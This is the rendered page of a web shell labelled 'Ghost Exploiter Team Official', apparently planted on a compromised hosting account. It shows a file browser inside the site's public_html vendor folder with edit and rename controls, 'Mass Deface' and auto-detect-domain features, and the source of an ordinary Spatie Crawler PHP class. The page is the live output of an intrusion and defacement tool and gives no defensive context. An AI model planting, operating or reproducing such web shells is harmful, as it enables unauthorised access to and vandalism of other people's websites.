webshell
Ghost Exploiter Team Official
Mass Deface
Directory >>
/
home
/
whitjouh
/
public_html
/
core
/
vendor
/
spatie
/
crawler
/
src
/
Mass Deface Auto Detect Domain
/*Ubah Ke document_root untuk mass deface*/
File / Folder
Size
Action
.
-
+New File
CrawlObservers
--
ren
CrawlProfiles
--
ren
CrawlQueues
--
ren
Exceptions
--
ren
Handlers
--
ren
CrawlUrl.php
0.744KB
edt
ren
Crawler.php
13.223KB
edt
ren
CrawlerRobots.php
1.137KB
edt
ren
LinkAdder.php
3.228KB
edt
ren
ResponseWithCachedBody.php
0.717KB
edt
ren
<?php namespace Spatie\Crawler; use Psr\Http\Message\UriInterface; class CrawlUrl { public UriInterface $url; public ?UriInterface $foundOnUrl = null; protected mixed $id; public static function create(UriInterface $url, ?UriInterface $foundOnUrl = null, $id = null): static { $static = new static($url, $foundOnUrl); if ($id !== null) { $static->setId($id); } return $static; } protected function __construct(UriInterface $url, $foundOnUrl = null) { $this->url = $url; $this->foundOnUrl = $foundOnUrl; } public function getId(): mixed { return $this->id; } public function setId($id): void { $this->id = $id; } }